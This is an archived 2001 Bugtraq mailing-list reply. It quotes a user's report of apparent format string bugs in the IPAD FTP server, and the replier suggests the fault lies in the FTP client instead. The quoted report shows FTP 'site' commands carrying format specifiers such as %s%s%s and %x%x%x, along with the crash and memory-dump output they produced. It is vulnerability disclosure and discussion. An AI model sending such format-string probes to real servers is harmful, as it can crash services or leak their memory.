[19298] in bugtraq
Re: Multi format string bugs in IPAD x.x ftp server
daemon@ATHENA.MIT.EDU (Eric Fitzgerald)
Tue Feb 20 14:06:34 2001
MIME-Version: 1.0
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
Message-ID: <04d401c09ad9$04f6fc90$0b1f8acf@eric>
Date: Mon, 19 Feb 2001 17:04:04 -0800
Reply-To: Eric Fitzgerald <eric@AMNTV.COM>
From: Eric Fitzgerald <eric@AMNTV.COM>
X-To: diab_qaip@HOTMAIL.COM
To: BUGTRAQ@SECURITYFOCUS.COM
If I'm reading this correct. This appears to be format string bugs in your
FTP client. Not in the server (notice the seg fault took you too your
prompt)
----- Original Message -----
From: "diab" <diab_qaip@HOTMAIL.COM>
To: <BUGTRAQ@SECURITYFOCUS.COM>
Sent: Saturday, February 17, 2001 7:03 AM
Subject: Multi format string bugs in IPAD x.x ftp server
> Hi ppl,
> There appears to be multiple format string bug's
> in IPAD x.x ftp server. Here are some
> examples with the 'site' command:
>
> [diab@epuj diab]$ ftp xxx.xxx.xxx.xxx
> Connected to xxx.xxx.xxx.xxx.
> 220 xxx.xxx.xxx.xxx FTP server (IPAD 2.52) ready
> at Wed Feb 14 16:08:08 2001
> Name (xxx.xxx.xxx.xxx:diab): anonymous
> 331 Anonymous logins ok. Please enter your e-mail
> address as password.
> Password:
> 230 User anonymous logged in.
> Remote system type is MSDOS.
> ftp> site %s%s%s%s%s%s%s%s%s%s%s%s%s%s
> Segmentation fault
> [diab@epuj diab]$
>
> or:
> ftp> site %x%x%x%x%x%x%x%x%x%x%x
> 500 Unknown command 'site
>
8057478806014080635400bfffcc784554495325782520257825782578257825782578257825
78'
>
> or:
> ftp> site %p%p
> 500 Unknown command
> '8067efc680000184013dab8684013db98'
>
> or:
> ftp> site %c%c%c%c
> 500 Unknown command
> '2570(nil)(nil)(nil)(nil)(nil)(nil)(nil)(nil)(nil)(nil)(nil)(nil)(nil)0x4
> etc
> ftp> quit
> 500 Unknown command 'site
> 0.0000000.00000098099176241206326244409344.000000'
> [diab@epuj diab]$
>
> Anyway I thought I might bring this issue to some
> people's attention.
> bye,
> - diab
>
>
>
